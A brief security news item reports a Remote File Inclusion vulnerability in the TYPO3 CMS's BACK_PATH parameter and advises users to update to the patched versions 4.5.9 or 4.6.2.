The TYPO3 developer team have identified a critical hole in the CMS which could allow an attacker to compromise a server. Insufficient checking of the AbstractController.php file's BACK_PATH parameter enables attackers to upload and execute arbitrary PHP scripts (Remote File Inclusion). The TYPO3 developers have been informed that attackers are already trying to intrude into users' servers on a large scale. The development team have now provided a patch and released the corrected version 4.5.9 and 4.6.2. We suggest if you use TYPO3 you update with immediately.
View all comments